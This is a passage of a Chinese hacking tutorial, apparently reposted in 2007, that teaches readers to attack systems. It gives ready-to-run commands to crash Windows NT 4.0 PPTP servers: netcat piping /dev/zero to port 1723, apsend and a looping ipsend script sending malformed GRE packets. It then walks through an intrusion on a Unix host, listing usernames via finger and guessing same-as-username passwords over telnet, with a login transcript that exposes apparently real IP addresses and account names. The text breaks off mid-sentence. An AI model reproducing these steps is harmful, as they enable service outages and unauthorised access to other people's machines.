流行的漏洞入侵(四)
發表于:2007-07-02來源:作者:點擊數:
標簽:
6 教你DoS攻擊微軟的PPTP 呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什么東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的 網絡 協議. 此協議需TCP(端口1723)和GRE以完成工作. 易收攻擊系統: * Dell PowerEdge 2200
6 教你DoS攻擊微軟的PPTP
呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什么東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的
網絡協議. 此協議需TCP(端口1723)和GRE以完成工作.
易收攻擊系統:
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension
XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0
安全的系統:
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3
CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0
如何實現:
~~~~~~~~~
*需要的工具*
1.UNIX box(例如
linux,*bsd....)
2.netcat ( )
3.apsend ( )
4.ipsend ( )
OK,這就好說了,
我們來看它的三個BUG
1 TCP端口1723
此弱點只在prior至SP6的機器上有效。并不是所有的機器都存在這個漏洞;請在
Unix 操作系統內鍵入以下:
$ nc 1723 < /dev/zero
如機器存在此漏洞, 目標主機將在幾秒種之內藍屏,并有如下錯誤:
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒,此弱點只對部分機器有效
2 GRE
此弱點對所有Service pack有效
在目標機器上,打開任務管理器選擇“運行”。并打開 一個DOS窗口(開始-運行-CMD).在Unix類操作系統上:
$ apsend -d --protocol 47 -m 0 -q
在目標主機上你將看到任務管理器內內核記憶的數字將緩慢上升。最終,這些數字將停止增加;此時, CPU在一段時間內有可能被100%占用?,F在你可以試著在命令提示符后鍵入一個命令例如DIR,這時你將看 到一個信息說提示操作系統已不可能完成要執行的命令
3弱點三:GRE
此弱點同樣對所有的Service pack有效。請在Unix操作系統上:
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目標主機很快會藍屏,大概需要50個數據包。
明白了吧
7 UNIX攻擊
這里為了方便我們用finger 0@ip 來找UNIX的薄弱機器
C:\>finger 0@IP
xxx.xxx.xxx.xxx]
Login Name TTY Idle When Where
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
jeffrey ??? pts/0 203.66.149.11
daniel ??? 437 114cm.kcable.
jamie ??? 0 203.66.162.68
postgres ??? pts/2 203.66.162.80
nsadmin ??? 768 203.66.19.50
ho ??? 390 61.169.209.106
house18 ??? pts/1 203.66.250.1
tong ??? pts/0 210.226. 42.69
jliu ??? pts/0 203.66.52.87
ptai ??? < . . . . >
看到了嗎,這里的LOGIN下的就是我們要的用戶名了
比如jeffrey,Daniel,Jamie,postgres
下面我們就來入侵
C:\>telnet xxx.xxx.xxx.xxx
一般的情況下我們都是猜密碼,怎么猜??就是上面LOGIN下的用戶名讓它又做用戶名和密碼呀,事實上總有一些人為了方便是這么設置的
login: ptai (***輸入用戶名***)
Password: **** (***輸入密碼***)
Login incorrect (***登陸失敗***)
login: jliu
Password:
Login incorrect
$ login: tong
Password:
Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***這個用戶上次登陸時的IP***)
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail. (***HOHO~登陸成功啦***)
看看這不就進來了
$ uname –a (***查看系統版本和補丁信息***)
$ set (***查看一些系?
原文轉自:http://www.kjueaiud.com